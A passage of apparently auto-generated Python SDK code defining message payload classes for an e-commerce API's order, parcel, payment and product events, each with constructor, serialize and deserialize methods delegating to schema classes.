def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerEmailSetMessagePayload":
from ._schemas.message import OrderCustomerEmailSetMessagePayloadSchema
return OrderCustomerEmailSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerEmailSetMessagePayloadSchema
return OrderCustomerEmailSetMessagePayloadSchema().dump(self)
class OrderCustomerGroupSetMessagePayload(MessagePayload):
customer_group: typing.Optional["CustomerGroupReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer_group = customer_group
self.old_customer_group = old_customer_group
super().__init__(type="OrderCustomerGroupSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerGroupSetMessagePayload":
from ._schemas.message import OrderCustomerGroupSetMessagePayloadSchema
return OrderCustomerGroupSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerGroupSetMessagePayloadSchema
return OrderCustomerGroupSetMessagePayloadSchema().dump(self)
class OrderCustomerSetMessagePayload(MessagePayload):
customer: typing.Optional["CustomerReference"]
customer_group: typing.Optional["CustomerGroupReference"]
old_customer: typing.Optional["CustomerReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
customer: typing.Optional["CustomerReference"] = None,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer: typing.Optional["CustomerReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer = customer
self.customer_group = customer_group
self.old_customer = old_customer
self.old_customer_group = old_customer_group
super().__init__(type="OrderCustomerSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerSetMessagePayload":
from ._schemas.message import OrderCustomerSetMessagePayloadSchema
return OrderCustomerSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerSetMessagePayloadSchema
return OrderCustomerSetMessagePayloadSchema().dump(self)
class OrderDeletedMessagePayload(MessagePayload):
order: "Order"
def __init__(self, *, order: "Order"):
self.order = order
super().__init__(type="OrderDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDeletedMessagePayload":
from ._schemas.message import OrderDeletedMessagePayloadSchema
return OrderDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDeletedMessagePayloadSchema
return OrderDeletedMessagePayloadSchema().dump(self)
class OrderDiscountCodeAddedMessagePayload(MessagePayload):
discount_code: "DiscountCodeReference"
def __init__(self, *, discount_code: "DiscountCodeReference"):
self.discount_code = discount_code
super().__init__(type="OrderDiscountCodeAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeAddedMessagePayload":
from ._schemas.message import OrderDiscountCodeAddedMessagePayloadSchema
return OrderDiscountCodeAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeAddedMessagePayloadSchema
return OrderDiscountCodeAddedMessagePayloadSchema().dump(self)
class OrderDiscountCodeRemovedMessagePayload(MessagePayload):
discount_code: "DiscountCodeReference"
def __init__(self, *, discount_code: "DiscountCodeReference"):
self.discount_code = discount_code
super().__init__(type="OrderDiscountCodeRemoved")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeRemovedMessagePayload":
from ._schemas.message import OrderDiscountCodeRemovedMessagePayloadSchema
return OrderDiscountCodeRemovedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeRemovedMessagePayloadSchema
return OrderDiscountCodeRemovedMessagePayloadSchema().dump(self)
class OrderDiscountCodeStateSetMessagePayload(MessagePayload):
discount_code: "DiscountCodeReference"
state: "DiscountCodeState"
old_state: typing.Optional["DiscountCodeState"]
def __init__(
self,
*,
discount_code: "DiscountCodeReference",
state: "DiscountCodeState",
old_state: typing.Optional["DiscountCodeState"] = None
):
self.discount_code = discount_code
self.state = state
self.old_state = old_state
super().__init__(type="OrderDiscountCodeStateSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeStateSetMessagePayload":
from ._schemas.message import OrderDiscountCodeStateSetMessagePayloadSchema
return OrderDiscountCodeStateSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeStateSetMessagePayloadSchema
return OrderDiscountCodeStateSetMessagePayloadSchema().dump(self)
class OrderEditAppliedMessagePayload(MessagePayload):
edit: "OrderEditReference"
result: "OrderEditApplied"
def __init__(self, *, edit: "OrderEditReference", result: "OrderEditApplied"):
self.edit = edit
self.result = result
super().__init__(type="OrderEditApplied")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderEditAppliedMessagePayload":
from ._schemas.message import OrderEditAppliedMessagePayloadSchema
return OrderEditAppliedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderEditAppliedMessagePayloadSchema
return OrderEditAppliedMessagePayloadSchema().dump(self)
class OrderImportedMessagePayload(MessagePayload):
order: "Order"
def __init__(self, *, order: "Order"):
self.order = order
super().__init__(type="OrderImported")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderImportedMessagePayload":
from ._schemas.message import OrderImportedMessagePayloadSchema
return OrderImportedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderImportedMessagePayloadSchema
return OrderImportedMessagePayloadSchema().dump(self)
class OrderLineItemAddedMessagePayload(MessagePayload):
line_item: "LineItem"
added_quantity: int
def __init__(self, *, line_item: "LineItem", added_quantity: int):
self.line_item = line_item
self.added_quantity = added_quantity
super().__init__(type="OrderLineItemAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemAddedMessagePayload":
from ._schemas.message import OrderLineItemAddedMessagePayloadSchema
return OrderLineItemAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemAddedMessagePayloadSchema
return OrderLineItemAddedMessagePayloadSchema().dump(self)
class OrderLineItemDiscountSetMessagePayload(MessagePayload):
line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
total_price: "Money"
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
total_price: "Money",
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.line_item_id = line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.total_price = total_price
self.taxed_price = taxed_price
super().__init__(type="OrderLineItemDiscountSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemDiscountSetMessagePayload":
from ._schemas.message import OrderLineItemDiscountSetMessagePayloadSchema
return OrderLineItemDiscountSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemDiscountSetMessagePayloadSchema
return OrderLineItemDiscountSetMessagePayloadSchema().dump(self)
class OrderPaymentStateChangedMessagePayload(MessagePayload):
payment_state: "PaymentState"
old_payment_state: typing.Optional["PaymentState"]
def __init__(
self,
*,
payment_state: "PaymentState",
old_payment_state: typing.Optional["PaymentState"] = None
):
self.payment_state = payment_state
self.old_payment_state = old_payment_state
super().__init__(type="OrderPaymentStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderPaymentStateChangedMessagePayload":
from ._schemas.message import OrderPaymentStateChangedMessagePayloadSchema
return OrderPaymentStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderPaymentStateChangedMessagePayloadSchema
return OrderPaymentStateChangedMessagePayloadSchema().dump(self)
class OrderReturnInfoAddedMessagePayload(MessagePayload):
return_info: "ReturnInfo"
def __init__(self, *, return_info: "ReturnInfo"):
self.return_info = return_info
super().__init__(type="ReturnInfoAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnInfoAddedMessagePayload":
from ._schemas.message import OrderReturnInfoAddedMessagePayloadSchema
return OrderReturnInfoAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderReturnInfoAddedMessagePayloadSchema
return OrderReturnInfoAddedMessagePayloadSchema().dump(self)
class OrderReturnShipmentStateChangedMessagePayload(MessagePayload):
return_item_id: str
return_shipment_state: "ReturnShipmentState"
def __init__(
self, *, return_item_id: str, return_shipment_state: "ReturnShipmentState"
):
self.return_item_id = return_item_id
self.return_shipment_state = return_shipment_state
super().__init__(type="OrderReturnShipmentStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnShipmentStateChangedMessagePayload":
from ._schemas.message import (
OrderReturnShipmentStateChangedMessagePayloadSchema,
)
return OrderReturnShipmentStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import (
OrderReturnShipmentStateChangedMessagePayloadSchema,
)
return OrderReturnShipmentStateChangedMessagePayloadSchema().dump(self)
class OrderShipmentStateChangedMessagePayload(MessagePayload):
shipment_state: "ShipmentState"
old_shipment_state: typing.Optional["ShipmentState"]
def __init__(
self,
*,
shipment_state: "ShipmentState",
old_shipment_state: typing.Optional["ShipmentState"] = None
):
self.shipment_state = shipment_state
self.old_shipment_state = old_shipment_state
super().__init__(type="OrderShipmentStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShipmentStateChangedMessagePayload":
from ._schemas.message import OrderShipmentStateChangedMessagePayloadSchema
return OrderShipmentStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShipmentStateChangedMessagePayloadSchema
return OrderShipmentStateChangedMessagePayloadSchema().dump(self)
class OrderShippingAddressSetMessagePayload(MessagePayload):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(type="OrderShippingAddressSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingAddressSetMessagePayload":
from ._schemas.message import OrderShippingAddressSetMessagePayloadSchema
return OrderShippingAddressSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingAddressSetMessagePayloadSchema
return OrderShippingAddressSetMessagePayloadSchema().dump(self)
class OrderShippingInfoSetMessagePayload(MessagePayload):
shipping_info: typing.Optional["ShippingInfo"]
old_shipping_info: typing.Optional["ShippingInfo"]
def __init__(
self,
*,
shipping_info: typing.Optional["ShippingInfo"] = None,
old_shipping_info: typing.Optional["ShippingInfo"] = None
):
self.shipping_info = shipping_info
self.old_shipping_info = old_shipping_info
super().__init__(type="OrderShippingInfoSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingInfoSetMessagePayload":
from ._schemas.message import OrderShippingInfoSetMessagePayloadSchema
return OrderShippingInfoSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingInfoSetMessagePayloadSchema
return OrderShippingInfoSetMessagePayloadSchema().dump(self)
class OrderShippingRateInputSetMessagePayload(MessagePayload):
shipping_rate_input: typing.Optional["ShippingRateInput"]
old_shipping_rate_input: typing.Optional["ShippingRateInput"]
def __init__(
self,
*,
shipping_rate_input: typing.Optional["ShippingRateInput"] = None,
old_shipping_rate_input: typing.Optional["ShippingRateInput"] = None
):
self.shipping_rate_input = shipping_rate_input
self.old_shipping_rate_input = old_shipping_rate_input
super().__init__(type="OrderShippingRateInputSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingRateInputSetMessagePayload":
from ._schemas.message import OrderShippingRateInputSetMessagePayloadSchema
return OrderShippingRateInputSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingRateInputSetMessagePayloadSchema
return OrderShippingRateInputSetMessagePayloadSchema().dump(self)
class OrderStateChangedMessagePayload(MessagePayload):
order_state: "OrderState"
old_order_state: "OrderState"
def __init__(self, *, order_state: "OrderState", old_order_state: "OrderState"):
self.order_state = order_state
self.old_order_state = old_order_state
super().__init__(type="OrderStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateChangedMessagePayload":
from ._schemas.message import OrderStateChangedMessagePayloadSchema
return OrderStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateChangedMessagePayloadSchema
return OrderStateChangedMessagePayloadSchema().dump(self)
class OrderStateTransitionMessagePayload(MessagePayload):
state: "StateReference"
force: bool
def __init__(self, *, state: "StateReference", force: bool):
self.state = state
self.force = force
super().__init__(type="OrderStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateTransitionMessagePayload":
from ._schemas.message import OrderStateTransitionMessagePayloadSchema
return OrderStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateTransitionMessagePayloadSchema
return OrderStateTransitionMessagePayloadSchema().dump(self)
class OrderStoreSetMessagePayload(MessagePayload):
store: "StoreKeyReference"
def __init__(self, *, store: "StoreKeyReference"):
self.store = store
super().__init__(type="OrderStoreSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStoreSetMessagePayload":
from ._schemas.message import OrderStoreSetMessagePayloadSchema
return OrderStoreSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStoreSetMessagePayloadSchema
return OrderStoreSetMessagePayloadSchema().dump(self)
class ParcelAddedToDeliveryMessagePayload(MessagePayload):
delivery: "Delivery"
parcel: "Parcel"
def __init__(self, *, delivery: "Delivery", parcel: "Parcel"):
self.delivery = delivery
self.parcel = parcel
super().__init__(type="ParcelAddedToDelivery")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelAddedToDeliveryMessagePayload":
from ._schemas.message import ParcelAddedToDeliveryMessagePayloadSchema
return ParcelAddedToDeliveryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelAddedToDeliveryMessagePayloadSchema
return ParcelAddedToDeliveryMessagePayloadSchema().dump(self)
class ParcelItemsUpdatedMessagePayload(MessagePayload):
parcel_id: str
delivery_id: typing.Optional[str]
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
parcel_id: str,
delivery_id: typing.Optional[str] = None,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.parcel_id = parcel_id
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(type="ParcelItemsUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelItemsUpdatedMessagePayload":
from ._schemas.message import ParcelItemsUpdatedMessagePayloadSchema
return ParcelItemsUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelItemsUpdatedMessagePayloadSchema
return ParcelItemsUpdatedMessagePayloadSchema().dump(self)
class ParcelMeasurementsUpdatedMessagePayload(MessagePayload):
delivery_id: str
parcel_id: str
measurements: typing.Optional["ParcelMeasurements"]
def __init__(
self,
*,
delivery_id: str,
parcel_id: str,
measurements: typing.Optional["ParcelMeasurements"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.measurements = measurements
super().__init__(type="ParcelMeasurementsUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelMeasurementsUpdatedMessagePayload":
from ._schemas.message import ParcelMeasurementsUpdatedMessagePayloadSchema
return ParcelMeasurementsUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelMeasurementsUpdatedMessagePayloadSchema
return ParcelMeasurementsUpdatedMessagePayloadSchema().dump(self)
class ParcelRemovedFromDeliveryMessagePayload(MessagePayload):
delivery_id: str
parcel: "Parcel"
def __init__(self, *, delivery_id: str, parcel: "Parcel"):
self.delivery_id = delivery_id
self.parcel = parcel
super().__init__(type="ParcelRemovedFromDelivery")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelRemovedFromDeliveryMessagePayload":
from ._schemas.message import ParcelRemovedFromDeliveryMessagePayloadSchema
return ParcelRemovedFromDeliveryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelRemovedFromDeliveryMessagePayloadSchema
return ParcelRemovedFromDeliveryMessagePayloadSchema().dump(self)
class ParcelTrackingDataUpdatedMessagePayload(MessagePayload):
delivery_id: str
parcel_id: str
tracking_data: typing.Optional["TrackingData"]
def __init__(
self,
*,
delivery_id: str,
parcel_id: str,
tracking_data: typing.Optional["TrackingData"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.tracking_data = tracking_data
super().__init__(type="ParcelTrackingDataUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelTrackingDataUpdatedMessagePayload":
from ._schemas.message import ParcelTrackingDataUpdatedMessagePayloadSchema
return ParcelTrackingDataUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelTrackingDataUpdatedMessagePayloadSchema
return ParcelTrackingDataUpdatedMessagePayloadSchema().dump(self)
class PaymentCreatedMessagePayload(MessagePayload):
payment: "Payment"
def __init__(self, *, payment: "Payment"):
self.payment = payment
super().__init__(type="PaymentCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentCreatedMessagePayload":
from ._schemas.message import PaymentCreatedMessagePayloadSchema
return PaymentCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentCreatedMessagePayloadSchema
return PaymentCreatedMessagePayloadSchema().dump(self)
class PaymentInteractionAddedMessagePayload(MessagePayload):
interaction: "CustomFields"
def __init__(self, *, interaction: "CustomFields"):
self.interaction = interaction
super().__init__(type="PaymentInteractionAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentInteractionAddedMessagePayload":
from ._schemas.message import PaymentInteractionAddedMessagePayloadSchema
return PaymentInteractionAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentInteractionAddedMessagePayloadSchema
return PaymentInteractionAddedMessagePayloadSchema().dump(self)
class PaymentStatusInterfaceCodeSetMessagePayload(MessagePayload):
payment_id: str
interface_code: str
def __init__(self, *, payment_id: str, interface_code: str):
self.payment_id = payment_id
self.interface_code = interface_code
super().__init__(type="PaymentStatusInterfaceCodeSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusInterfaceCodeSetMessagePayload":
from ._schemas.message import PaymentStatusInterfaceCodeSetMessagePayloadSchema
return PaymentStatusInterfaceCodeSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusInterfaceCodeSetMessagePayloadSchema
return PaymentStatusInterfaceCodeSetMessagePayloadSchema().dump(self)
class PaymentStatusStateTransitionMessagePayload(MessagePayload):
state: "StateReference"
force: bool
def __init__(self, *, state: "StateReference", force: bool):
self.state = state
self.force = force
super().__init__(type="PaymentStatusStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusStateTransitionMessagePayload":
from ._schemas.message import PaymentStatusStateTransitionMessagePayloadSchema
return PaymentStatusStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusStateTransitionMessagePayloadSchema
return PaymentStatusStateTransitionMessagePayloadSchema().dump(self)
class PaymentTransactionAddedMessagePayload(MessagePayload):
transaction: "Transaction"
def __init__(self, *, transaction: "Transaction"):
self.transaction = transaction
super().__init__(type="PaymentTransactionAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionAddedMessagePayload":
from ._schemas.message import PaymentTransactionAddedMessagePayloadSchema
return PaymentTransactionAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionAddedMessagePayloadSchema
return PaymentTransactionAddedMessagePayloadSchema().dump(self)
class PaymentTransactionStateChangedMessagePayload(MessagePayload):
transaction_id: str
state: "TransactionState"
def __init__(self, *, transaction_id: str, state: "TransactionState"):
self.transaction_id = transaction_id
self.state = state
super().__init__(type="PaymentTransactionStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionStateChangedMessagePayload":
from ._schemas.message import PaymentTransactionStateChangedMessagePayloadSchema
return PaymentTransactionStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionStateChangedMessagePayloadSchema
return PaymentTransactionStateChangedMessagePayloadSchema().dump(self)
class ProductAddedToCategoryMessagePayload(MessagePayload):
category: "CategoryReference"
staged: bool
def __init__(self, *, category: "CategoryReference", staged: bool):
self.category = category
self.staged = staged
super().__init__(type="ProductAddedToCategory")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductAddedToCategoryMessagePayload":
from ._schemas.message import ProductAddedToCategoryMessagePayloadSchema
return ProductAddedToCategoryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductAddedToCategoryMessagePayloadSchema
return ProductAddedToCategoryMessagePayloadSchema().dump(self)
class ProductCreatedMessagePayload(MessagePayload):
product_projection: "ProductProjection"
def __init__(self, *, product_projection: "ProductProjection"):
self.product_projection = product_projection
super().__init__(type="ProductCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductCreatedMessagePayload":
from ._schemas.message import ProductCreatedMessagePayloadSchema
return ProductCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductCreatedMessagePayloadSchema
return ProductCreatedMessagePayloadSchema().dump(self)
class ProductDeletedMessagePayload(MessagePayload):
removed_image_urls: typing.List["str"]
current_projection: "ProductProjection"
def __init__(
self,
*,
removed_image_urls: typing.List["str"],
current_projection: "ProductProjection"
):
self.removed_image_urls = removed_image_urls
self.current_projection = current_projection
super().__init__(type="ProductDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductDeletedMessagePayload":
from ._schemas.message import ProductDeletedMessagePayloadSchema
return ProductDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductDeletedMessagePayloadSchema
return ProductDeletedMessagePayloadSchema().dump(self)
class ProductImageAddedMessagePayload(MessagePayload):
variant_id: int
image: "Image"
staged: bool
def __init__(self, *, variant_id: int, image: "Image", staged: bool):
self.variant_id = variant_id
self.image = image
self.staged = staged
super().__init__(type="ProductImageAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductImageAddedMessagePayload":
from ._schemas.message import ProductImageAddedMessagePayloadSchema
return ProductImageAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductImageAddedMessagePayloadSchema
return ProductImageAddedMessagePayloadSchema().dump(self)
class ProductPriceDiscountsSetMessagePayload(MessagePayload):
updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
def __init__(
self, *, updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
):
self.updated_prices = updated_prices
super().__init__(type="ProductPriceDiscountsSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceDiscountsSetMessagePayload":
from ._schemas.message import ProductPriceDiscountsSetMessagePayloadSchema
return ProductPriceDiscountsSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceDiscountsSetMessagePayloadSchema
return ProductPriceDiscountsSetMessagePayloadSchema().dump(self)
class ProductPriceExternalDiscountSetMessagePayload(MessagePayload):
variant_id: int
variant_key: typing.Optional[str]
sku: typing.Optional[str]
price_id: str
discounted: typing.Optional["DiscountedPrice"]
staged: bool
def __init__(
self,
*,
variant_id: int,
variant_key: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
price_id: str,
discounted: typing.Optional["DiscountedPrice"] = None,
staged: bool
):
self.variant_id = variant_id
self.variant_key = variant_key
self.sku = sku
self.price_id = price_id
self.discounted = discounted
self.staged = staged
super().__init__(type="ProductPriceExternalDiscountSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceExternalDiscountSetMessagePayload":
from ._schemas.message import (
ProductPriceExternalDiscountSetMessagePayloadSchema,
)
return ProductPriceExternalDiscountSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import (
ProductPriceExternalDiscountSetMessagePayloadSchema,
)
return ProductPriceExternalDiscountSetMessagePayloadSchema().dump(self)
class ProductPublishedMessagePayload(MessagePayload):
removed_image_urls: typing.List["str"]
product_projection: "ProductProjection"
scope: "ProductPublishScope"
def __init__(
self,
*,
removed_image_urls: typing.List["str"],
product_projection: "ProductProjection",
scope: "ProductPublishScope"
):
self.removed_image_urls = removed_image_urls
self.product_projection = product_projection
self.scope = scope
super().__init__(type="ProductPublished")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPublishedMessagePayload":
from ._schemas.message import ProductPublishedMessagePayloadSchema
return ProductPublishedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPublishedMessagePayloadSchema
return ProductPublishedMessagePayloadSchema().dump(self)
class ProductRemovedFromCategoryMessagePayload(MessagePayload):
category: "CategoryReference"
staged: bool
def __init__(self, *, category: "CategoryReference", staged: bool):
self.category = category
self.staged = staged
super().__init__(type="ProductRemovedFromCategory")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRemovedFromCategoryMessagePayload":
from ._schemas.message import ProductRemovedFromCategoryMessagePayloadSchema
return ProductRemovedFromCategoryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRemovedFromCategoryMessagePayloadSchema
return ProductRemovedFromCategoryMessagePayloadSchema().dump(self)
class ProductRevertedStagedChangesMessagePayload(MessagePayload):
removed_image_urls: typing.List["str"]
def __init__(self, *, removed_image_urls: typing.List["str"]):
self.removed_image_urls = removed_image_urls
super().__init__(type="ProductRevertedStagedChanges")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRevertedStagedChangesMessagePayload":
from ._schemas.message import ProductRevertedStagedChangesMessagePayloadSchema
return ProductRevertedStagedChangesMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRevertedStagedChangesMessagePayloadSchema
return ProductRevertedStagedChangesMessagePayloadSchema().dump(self)
class ProductSlugChangedMessagePayload(MessagePayload):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
slug: "LocalizedString",
old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(type="ProductSlugChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductSlugChangedMessagePayload":
from ._schemas.message import ProductSlugChangedMessagePayloadSchema
return ProductSlugChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductSlugChangedMessagePayloadSchema
return ProductSlugChangedMessagePayloadSchema().dump(self)
class ProductStateTransitionMessagePayload(MessagePayload):
state: "StateReference"
force: bool
def __init__(self, *, state: "StateReference", force: bool):
self.state = state
self.force = force
super().__init__(type="ProductStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductStateTransitionMessagePayload":
from ._schemas.message import ProductStateTransitionMessagePayloadSchema
return ProductStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductStateTransitionMessagePayloadSchema
return ProductStateTransitionMessagePayloadSchema().dump(self)
class ProductUnpublishedMessagePayload(MessagePayload):
def __init__(self):
super().__init__(type="ProductUnpublished")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductUnpublishedMessagePayload":
from ._schemas.message import ProductUnpublishedMessagePayloadSchema
return ProductUnpublishedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductUnpublishedMessagePayloadSchema
